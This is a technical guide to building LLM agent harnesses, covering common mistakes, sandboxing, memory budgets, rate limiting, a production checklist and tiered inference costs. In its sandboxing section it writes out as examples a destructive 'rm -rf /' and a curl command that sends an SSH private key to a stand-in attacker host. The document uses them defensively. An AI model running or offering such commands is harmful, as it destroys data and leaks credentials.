These are the mistakes that most harness builders make. Each one leads to production failures.

Mistake 1: No Sandbox for Tool Execution

What goes wrong: The LLM calls run_command with rm -rf / or curl attacker.com/exfil?data=$(cat ~/.ssh/id_rsa). Without a sandbox, the command executes with the harness process’s full permissions.

Fix: Every tool call passes through a validation layer before execution. Use allowlists (not blocklists) for shell commands. Run code execution in a container or restricted subprocess.

# BAD: Direct execution
result = subprocess.run(tool_call["arguments"]["command"], shell=True)

# GOOD: Validated execution
if not sandbox.allow(tool_call):
    return ToolResult(error="Blocked by policy")
result = subprocess.run(
    tool_call["arguments"]["command"],
    shell=True,
    timeout=30,
    cwd="/sandboxed/workspace",
    env=RESTRICTED_ENV,
)

Mistake 2: Memory Grows Unbounded

What goes wrong: Every message, tool result, and observation stays in the context window. By iteration 15, the context is full. The LLM either crashes or starts ignoring early context.

Fix: Implement a token budget per memory layer. Trim the message history with a sliding window. Summarize long tool outputs before adding them to context.

# BAD: Keep everything
messages.append(Message(role="tool", content=huge_file_contents))

# GOOD: Truncate and summarize
MAX_TOOL_OUTPUT = 4000  # characters
content = huge_file_contents
if len(content) > MAX_TOOL_OUTPUT:
    content = content[:MAX_TOOL_OUTPUT] + f"\n... [truncated, {len(huge_file_contents)} chars total]"
messages.append(Message(role="tool", content=content))

Mistake 3: No Rate Limiting on LLM Calls

What goes wrong: The loop runs as fast as possible, hitting the API rate limit. Each retry triggers another rate limit. Costs spike. The loop stalls for minutes.

Fix: Implement a rate limiter with exponential backoff.

class RateLimiter:
    def __init__(self, max_calls_per_minute: int = 30):
        self.max_rpm = max_calls_per_minute
        self.calls: list[float] = []

    async def wait(self):
        now = time.time()
        # Remove calls older than 60 seconds
        self.calls = [t for t in self.calls if now - t < 60]
        if len(self.calls) >= self.max_rpm:
            wait_time = 60 - (now - self.calls[0])
            logger.info(f"Rate limit: waiting {wait_time:.1f}s")
            await asyncio.sleep(wait_time)
        self.calls.append(time.time())

Mistake 4: Logging Is an Afterthought

What goes wrong: Something fails in production. You have no idea which tool was called, what arguments were passed, what the LLM was thinking, or where in the loop the failure occurred. Debugging becomes guesswork.

Fix: Log at every boundary: LLM call, tool dispatch, sandbox decision, memory load/store, session lifecycle events.

import logging
import json

logger = logging.getLogger("harness")

# Log structure for every LLM call
logger.info(json.dumps({
    "event": "llm_call",
    "iteration": state.iteration,
    "input_tokens": response.usage["input_tokens"],
    "output_tokens": response.usage["output_tokens"],
    "tool_calls": [c["name"] for c in response.tool_calls],
    "stop_reason": response.stop_reason,
}))

# Log structure for every tool execution
logger.info(json.dumps({
    "event": "tool_exec",
    "tool": call["name"],
    "sandbox_decision": "allowed",
    "duration_ms": int((end - start) * 1000),
    "is_error": result.is_error,
}))

Mistake 5: No Max Iteration Guard

What goes wrong: The LLM gets stuck in a loop (e.g., repeatedly trying to fix a test that cannot pass). It burns 200+ API calls before someone notices.

Fix: Hard cap on iterations, plus a “stuck detector” that aborts if the same tool call is repeated 3+ times.

Mistake 6: Mixing Concerns in the Planning Loop

What goes wrong: The loop function handles LLM calls, tool dispatch, memory management, logging, error recovery, and state persistence all in one 500-line function. A change to tool dispatch breaks memory consolidation.

Fix: Each of the 7 components has a clean interface (as shown above). The loop calls interfaces, not implementations. Swap any component without touching the others.

Mistake 7: No Context Budget Enforcement

What goes wrong: The system prompt is 8K tokens, MEMORY.md is 3K, the feature list is 2K, and the conversation history is 80K. Total: 93K. The model’s context window is 100K. There is only 7K left for the LLM to reason and respond. Output quality degrades sharply.

Fix: Set explicit budgets and enforce them:

CONTEXT_BUDGET = {
    "system_prompt": 2_000,
    "long_term_memory": 3_000,
    "working_memory": 5_000,
    "conversation_history": 70_000,
    "reserved_for_output": 20_000,
}
# Total: 100K = full context window

# Before each LLM call, verify:
total = sum(count_tokens(layer) for layer in all_layers)
if total > (CONTEXT_LIMIT - CONTEXT_BUDGET["reserved_for_output"]):
    trim_oldest_messages(conversation_history)

Production Architecture Checklist

Use this checklist to validate your harness before running it on real tasks.

Component Coverage

  • Component 1 (LLM): Provider configured with API key, model selected, fallback provider ready
  • Component 2 (Tools): At least 5 tools registered, each with input schema, validation, and error handling
  • Component 3 (Memory): All 4 layers implemented (short-term, working, long-term, auto-consolidation)
  • Component 4 (Planning Loop): ReAct or chosen framework runs stable over 20+ iterations without crashing
  • Component 5 (Sandbox): Policy defined, all tool calls validated before execution, audit log writing
  • Component 6 (Persistence): Workspace initialized, sessions saved, state files use atomic writes
  • Component 7 (Orchestration): Session lifecycle managed, error boundaries in place, graceful shutdown

Failure Mode Testing

For each component, verify the harness survives these failures:

ComponentFailure to testExpected behavior
LLMAPI returns 429 (rate limit)Exponential backoff, retry after delay
LLMAPI returns 500 (server error)Fallback to secondary provider
LLMResponse exceeds max tokensTruncation handled, loop continues
ToolsTool not foundError message returned, loop re-prompts
ToolsTool times outSubprocess killed, timeout error returned
ToolsTool returns malformed outputError wrapped, loop re-prompts
MemoryMEMORY.md file missingEmpty memory loaded, no crash
MemoryContext window nearly fullOldest messages trimmed automatically
LoopMax iterations reachedLoop exits cleanly with partial result
LoopSame tool call repeated 3xStuck detector triggers, forces new approach
SandboxPath traversal attemptBlocked, logged, loop continues
SandboxBlocked command attemptedBlocked, logged, error message to LLM
PersistenceDisk fullError caught, session saved to /tmp fallback
PersistenceCrash during writeAtomic rename prevents corruption
OrchestrationSIGINT during sessionGraceful shutdown, state flushed
OrchestrationUnhandled exception in toolCaught at orchestration level, session continues

Validation Criteria

Performance:

  • Full harness startup <5 seconds (memory load + initialization)
  • Single agent loop iteration <30 seconds end-to-end
  • Error recovery doesn’t cascade: one tool failure doesn’t crash harness
  • Context budgeting holds: never exceed 90% of available window

Implementation:

  • All 7 components implemented: LLM, tools, memory, loop, validation, persistence, orchestration
  • Tool registry defines 5+ tools with clear input/output schema
  • ReAct loop or chosen framework runs stable over 20+ iterations
  • Session persistence works: can resume after restart
  • Sandboxing prevents unsafe operations (file deletion, system calls)
  • At least one pattern (Single-Agent, Initializer-Executor, or Multi-Agent) fully functional

Integration:

  • LLM accepts tool definitions and makes valid tool calls
  • Tools return results in format agent can parse
  • Memory system loads at startup, persists after session
  • Error recovery: one component failure doesn’t cascade to others
  • Logging works: can trace full request from input to output

Sign-Off Criteria

  • Harness architecture documented with your component choices
  • All 7 components deployed and tested on real task
  • Chosen pattern (Single/Initializer-Executor/Multi-Agent) validated end-to-end
  • Performance benchmarks met: startup, latency, error handling
  • Production checklist complete: monitoring, logging, error recovery

Tiered Inference Architecture

Not everything needs an LLM. Not everything that needs an LLM needs the same LLM. A tiered architecture routes each problem to the cheapest tier that can handle it.

The Three Tiers

Tier 1: Deterministic (code). Zero cost. Instant. Perfect reliability. Python, SQL, rule engines, lookup tables. Handles everything with a known rule — date arithmetic, pattern matching, scoring algorithms, geographic lookups, input validation.

Tier 2: Local inference (7B-14B reasoning model). Zero marginal cost (hardware already owned). Slower (~173s per call for 14B). Excellent at deep, focused reasoning about one problem — reading evidence, chaining through logic, suggesting actions. Limited context window. Cannot reason broadly across many inputs.

Tier 3: API inference (70B+, Claude, GPT-4). Per-token cost. Fast. Excellent at broad reasoning — seeing patterns across large contexts, cross-referencing many items, strategic planning. Use for the work that Tier 2 genuinely cannot do.

Routing Rule

Route up only when you hit the wall. Start every task at Tier 1. If deterministic code can handle it, stop. If not, route to Tier 2. If the local model hits its limits (context too large, reasoning too broad, instructions not followed), route to Tier 3.

Most work stays at Tier 1. Tier 2 handles the edge cases Tier 1 can’t resolve. Tier 3 handles the strategic reasoning Tier 2 can’t do. The result: near-zero cost for 95% of work, with full capability available when needed.

The Deterministic-Probabilistic-Deterministic Sandwich

When using an LLM (Tier 2 or 3) for factual research, sandwich it between deterministic layers:

DETERMINISTIC IN → PROBABILISTIC MIDDLE → DETERMINISTIC OUT
  1. Deterministic in: Python searches sources, scores results through pass/fail gates, generates leads with evidence and failed gates attached.
  2. Probabilistic middle: LLM reads the evidence, reasons about what to search next. Python executes the suggested search. Results scored through the same gates. New evidence feeds back. Loop until resolved.
  3. Deterministic out: All accumulated evidence re-scored through deterministic gates. Facts extracted. Human reviews.

The LLM never decides what is true — it only suggests what to search for. A wrong suggestion wastes one search. A wrong fact corrupts data. Put the probabilistic layer where wrong answers are cheap.

Input Clustering

Group related inputs before sending to the LLM. A cluster of related items gives richer context without additional compute:

  • Without clustering: 14 individual LLM calls, each with thin context about one person
  • With clustering: 1 LLM call with rich context about the whole household

The LLM sees connections between items that individual calls would miss. One search suggestion can resolve multiple items. Fewer total LLM calls with better results.

Cluster by natural groupings in your domain — households, departments, related tickets, linked documents. The grouping key is whatever makes the items mutually informative.


Performance Optimizations (2025+)

  • Quantization: Use 4-bit AWQ models for cost/speed trade-off
  • KV cache quantization: GQA, INT8/INT4 cache, PagedAttention for memory and compute savings
  • Grouped Query Attention: Reduce KV cache footprint
  • Context trimming: Auto-cleanup old irrelevant context
  • Batch operations: Group tool calls when possible
  • Caching: Cache tool results across loops

How Components Map to Other Documents

Each component has deeper coverage in a dedicated document. Use this table to navigate:

ComponentRoleDetailed InWhat You’ll Find
1. LLM/AI ModelReasoning engineDoc 01 (01_foundation_models.md)Model selection (LLM vs SLM), multimodal capabilities, cost/speed trade-offs, quantization options
2. Tool IntegrationExternal capabilitiesDoc 08 (08_claw_code_python.md)Tool registry patterns, filesystem-based tool discovery, MCP protocol for extensibility
3. Memory ManagementContext persistenceDoc 04 (04_memory_systems.md)Four-layer architecture details, RAG vs LLM Wiki pattern, consolidation algorithms
4. Planning LoopAgentic reasoningDoc 05 (05_ai_agents.md)ReAct, Tree of Thought, Reflexion frameworks, when to use each
5. SandboxingSafety/validationDoc 08 (08_claw_code_python.md)Permission models and approval flows
6. PersistenceState/filesystemDoc 07 (07_openclaw_reference.md)File-based architecture, workspace layout conventions
7. OrchestrationSystem coordinationDoc 08 (08_claw_code_python.md)Session lifecycle, multi-provider routing, error recovery

Reading order for builders:

  1. Start here (Doc 06) for the big picture
  2. Read Doc 05 to choose your planning framework
  3. Read Doc 04 to design your memory system
  4. Read Doc 01 to select your model(s)
  5. Read Doc 08 to see a working reference implementation
  6. Read Doc 03 (03_huggingface_ecosystem.md) if running models locally
  7. Read Doc 02 (02_kv_cache_optimization.md) for performance tuning

Why Purpose-Built Harnesses Are More Efficient Than General-Purpose LLMs

A dedicated harness uses roughly 25x fewer tokens per call than asking a general-purpose LLM like Claude Code to do the same work. This is not a theoretical claim — it follows directly from what each system must include in every request.

Token Breakdown: General-Purpose vs Dedicated

ComponentGeneral-Purpose LLMDedicated Harness
System prompt~5,000 tokens (full assistant instructions)~110 tokens (domain rules only)
Tool definitions~3,000 tokens (20-40 tools in prompt)0 (Python dispatches tools directly)
Conversation history~8,000 tokens (growing each turn)0 (rebuilt from state each call)
File contents~6,000 tokens (reading code/context)0 (results pre-rendered as compact text)
Response~2,000 tokens (explanatory text)~650 tokens (structured JSON)
Total~24,500 tokens/turn~997 tokens/call

Why the Difference Is So Large

A general-purpose LLM carries everything it might need in every request: tool definitions for 20-40 tools it could potentially call, conversation history so it remembers what happened, file contents it read earlier, and a system prompt covering coding conventions, git workflow, security rules, and more. Most of this context is irrelevant to any single task, but it must all be present because the LLM does not know in advance which parts it will need.

A dedicated harness eliminates this overhead entirely. Python code handles tool dispatch, state management, and result formatting. The LLM receives only what it needs for one specific decision: a focused prompt, the current state rendered as compact text, and the latest results. Everything else lives in Python variables and on disk.

At Scale: The Multiplier Effect

Consider a real workload: analysing 200 research subjects, each requiring 5 LLM calls.

ApproachTokens per callTotal callsTotal tokens
General-purpose LLM~24,5001,000~24.5M
Dedicated harness~9971,000~1.0M

That is a 24.5x reduction in token consumption. At Claude Sonnet API rates ($3/$15 per 1M input/output tokens), the general-purpose approach costs roughly $180. The dedicated harness costs roughly $7.

The lesson: don’t use a Swiss Army knife when you need a scalpel. It costs more, it’s slower, and it cuts worse.


See Also

  • Doc 01 (Foundation Models): Component 1 — model selection and capabilities
  • Doc 02 (KV Cache Optimization): Performance tuning for local models
  • Doc 03 (HuggingFace Ecosystem): Model sourcing and quantization
  • Doc 04 (Memory Systems): Component 3 architecture and layer implementation
  • Doc 05 (AI Agents): Component 4 framework choices (ReAct, ToT, etc)
  • Doc 07 (Open-Source Agent Architectures): Component 6 file-based persistence patterns
  • Doc 08 (Python Agent Harness): Reference implementation of all 7 components